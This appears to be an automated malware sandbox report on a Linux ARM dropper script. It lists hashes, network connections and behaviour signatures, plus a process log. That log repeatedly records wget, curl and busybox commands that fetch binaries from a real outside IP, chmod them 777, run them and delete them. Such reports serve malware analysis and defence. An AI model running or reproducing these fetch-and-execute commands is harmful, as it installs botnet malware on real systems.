[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
N/A 224.0.0.251:5353 udp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
GB 195.181.164.14:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 03:36

Reported

2024-11-20 03:39

Platform

debian9-armhf-20240418-en

Max time kernel

23s

Max time network

25s

Command Line

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A

Processes

/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

